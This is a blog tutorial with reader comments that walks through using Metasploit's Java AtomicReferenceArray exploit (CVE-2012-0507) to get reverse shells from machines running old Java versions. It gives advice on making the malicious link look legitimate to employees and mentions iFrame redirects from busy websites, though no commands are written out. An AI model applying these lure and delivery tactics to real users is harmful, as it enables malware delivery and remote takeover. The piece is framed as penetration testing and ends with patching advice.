Another exploit that has to do with the Java SE is affecting end users and allows attackers to distribute malware and to obtain remote shells.The people behind Metasploit Framework have created a module based on partial code of this exploit.

According to Microsoft ”the vulnerability exploits a flaw in the deserialization of “AtomicReferenceArray” objects, which allows remote attackers to call system level Java functions via the ClassLoader of a constructor that is being deserialized without proper sandboxing.”

In this article we will see how we can use that exploit in order to attack a remote system.

We are opening the Metasploit Framework and we are searching for the java_atomicreferencearray exploit.

Search for Java Atomic Reference Array Exploit


We will use that exploit in order to test it against a machine that has installed the Java SE version 6 update 30.

Options for the Java Exploit


While executing the show options command in order to see the available options and settings we saw two things.First that the default port that the exploit will listen is 8080 and the URI path is blank.If we want to use this exploit on a real penetration test against our clients employees,it would be a good practice to change  the port to 80 and the URI path to / in order not to create any suspicious when we will send the link to them.Leaving the URI path to blank it will create a random path that it would not look legitimate so our test may fail.So we are giving the following settings to the exploit:

Java Exploit Settings and Payloads


As a payload we will use a Java command Shell and we will set our IP address:

Configuring the payload


We have done a last check with the show options command in order to check if the settings of the payload are properly configured:

Payload Options


Now it is time to run the exploit.As we can see from the image below the exploit will start a reverse handler to our machine and it will wait for anyone that will connect to our machine through our http server.

Execution of the Java Exploit


If someone tries to connect to our http server the exploit will executed and it will return a shell to us if the victim is having a vulnerable version of Java.Alternatively an attacker could use a popular website in order to redirect the users through iFrames to a new webpage where the exploit will executed.

Exploiting the Vulnerability


List the sessions that the Java Exploit opened


Affected Java Software

  • versions 7 update 2,
  • versions 6 update 30 and
  • versions 5 update 33



This vulnerability exists because the AtomicReferenceArray class is not checking properly whether the array is an appropriate object type.Most of the attackers are using this exploit in order to distribute malware to victim machines.Until now this type of attack can be detected only by two antivirus McAfee and NOD32 and affects various platforms from Windows to Linux and MacOS X so you need to patch your Java runtime environment in order to protect your systems from this attack.



  1. Good point.You cannot determine it that remotely.Attackers are just using other websites in order to redirect the traffic to a new page and they are hoping that some of the users will run vulnerable versions of the JRE in order to exploit them.That’s why they are choosing websites that have high traffic.In a White-box testing maybe you will have that information if there is inside the scope.

    1. That’s what I thought. You can probably infer by accessing other available services. If any java apps are running via http, you can assume it has SOME version of Java. but also never heard of any way to remotely fingerprinting Java versions.:)

  2. Hello,

    When trying to execute under metasploit I get an error that CVE-2012-0507.jar is missing. What am I doing wrong?

  3. If you are using Backtrack5 R2 stop the Apache Server first and then try to run the exploit.Also have a look at the directory /opt/metasploit/msf3/data/exploits to see if the CVE-2012-0507.jar exists.If for some reason the .jar file is not there I can upload it to a hosting site to take it and to put it to the exploit folder.Let us know what happened.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s